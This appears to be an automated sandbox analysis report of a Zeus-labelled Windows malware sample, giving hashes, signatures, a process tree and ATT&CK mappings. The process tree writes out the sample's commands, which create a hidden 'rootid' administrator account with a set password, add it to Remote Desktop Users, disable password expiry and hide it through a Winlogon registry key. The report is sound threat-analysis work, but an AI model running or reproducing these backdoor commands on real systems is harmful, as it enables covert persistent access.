Analysis

  • max time kernel
    117s
  • max time network
    137s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    19-07-2020 16:48

General

  • Target

    zeus 2_2.1.0.3.vir.exe

  • Size

    199KB

  • MD5

    dc6b98b9707c0922ab6a53b3efdd5dac

  • SHA1

    a72e76fbd5dfa53b3d27ed9d9e6d194a085d7d0e

  • SHA256

    f55d6bd5f13356eda64fae070a5eee1a080f06a0aa69bdd7e137496d88346be3

  • SHA512

    04b730c73876fc89eb465ebc069ad1e1bdbfbf5d1654a4bb49457d87ec290dd1832a571dea47adabea0d3f3c0461f8ce70d10fe2e4a82cbb698fed254c5d269b

Score
9/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Runs net.exe
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies WinLogon 2 TTPs 3 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\zeus 2_2.1.0.3.vir.exe
    "C:\Users\Admin\AppData\Local\Temp\zeus 2_2.1.0.3.vir.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1820
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\delme.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2500
      • C:\Windows\SysWOW64\PING.EXE
        ping localhost -n 3
        3⤵
        • Runs ping.exe
        PID:3532
      • C:\Windows\SysWOW64\PING.EXE
        ping localhost -n 3
        3⤵
        • Runs ping.exe
        PID:724
      • C:\Windows\SysWOW64\PING.EXE
        ping localhost -n 3
        3⤵
        • Runs ping.exe
        PID:1284
      • C:\Windows\SysWOW64\PING.EXE
        ping localhost -n 3
        3⤵
        • Runs ping.exe
        PID:2352
      • C:\Windows\SysWOW64\PING.EXE
        ping localhost -n 3
        3⤵
        • Runs ping.exe
        PID:1808
    • C:\Windows\SysWOW64\cscript.exe
      cscript ldapdi.vbs
      2⤵
        PID:2756
      • C:\Windows\SysWOW64\net.exe
        C:\Windows\system32\net.exe user rootid Stormload0987 /add
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3604
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user rootid Stormload0987 /add
          3⤵
            PID:3840
        • C:\Windows\SysWOW64\net.exe
          C:\Windows\system32\net.exe localgroup Administrators rootid /add
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3928
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup Administrators rootid /add
            3⤵
              PID:3904
          • C:\Windows\SysWOW64\net.exe
            C:\Windows\system32\net.exe localgroup "Remote Desktop Users" rootid /add
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1872
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup "Remote Desktop Users" rootid /add
              3⤵
                PID:2220
            • C:\Windows\SysWOW64\net.exe
              C:\Windows\system32\net.exe accounts /maxpwage:unlimited
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3764
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 accounts /maxpwage:unlimited
                3⤵
                  PID:636
              • C:\Windows\SysWOW64\reg.exe
                C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v rootid /t REG_DWORD /d "00000000" /f
                2⤵
                • Modifies WinLogon
                PID:672
              • C:\Users\Admin\AppData\Local\Temp\new.exe
                new.exe
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3984
                • C:\Users\Admin\AppData\Local\Temp\new.exe
                  "C:\Users\Admin\AppData\Local\Temp\new.exe"
                  3⤵
                    PID:904

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              Registry Run Keys / Startup Folder

              1
              T1060

              Account Manipulation

              1
              T1098

              Winlogon Helper DLL

              1
              T1004

              Defense Evasion

              Modify Registry

              2
              T1112

              Discovery

              Remote System Discovery

              1
              T1018

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\delme.bat
              • C:\Users\Admin\AppData\Local\Temp\ldapdi.vbs
              • C:\Users\Admin\AppData\Local\Temp\new.exe
              • C:\Users\Admin\AppData\Local\Temp\new.exe
              • memory/636-12-0x0000000000000000-mapping.dmp
              • memory/672-14-0x0000000000000000-mapping.dmp
              • memory/724-13-0x0000000000000000-mapping.dmp
              • memory/1284-18-0x0000000000000000-mapping.dmp
              • memory/1808-20-0x0000000000000000-mapping.dmp
              • memory/1872-9-0x0000000000000000-mapping.dmp
              • memory/2220-10-0x0000000000000000-mapping.dmp
              • memory/2352-19-0x0000000000000000-mapping.dmp
              • memory/2500-0-0x0000000000000000-mapping.dmp
              • memory/2756-1-0x0000000000000000-mapping.dmp
              • memory/3532-3-0x0000000000000000-mapping.dmp
              • memory/3604-5-0x0000000000000000-mapping.dmp
              • memory/3764-11-0x0000000000000000-mapping.dmp
              • memory/3840-6-0x0000000000000000-mapping.dmp
              • memory/3904-8-0x0000000000000000-mapping.dmp
              • memory/3928-7-0x0000000000000000-mapping.dmp
              • memory/3984-15-0x0000000000000000-mapping.dmp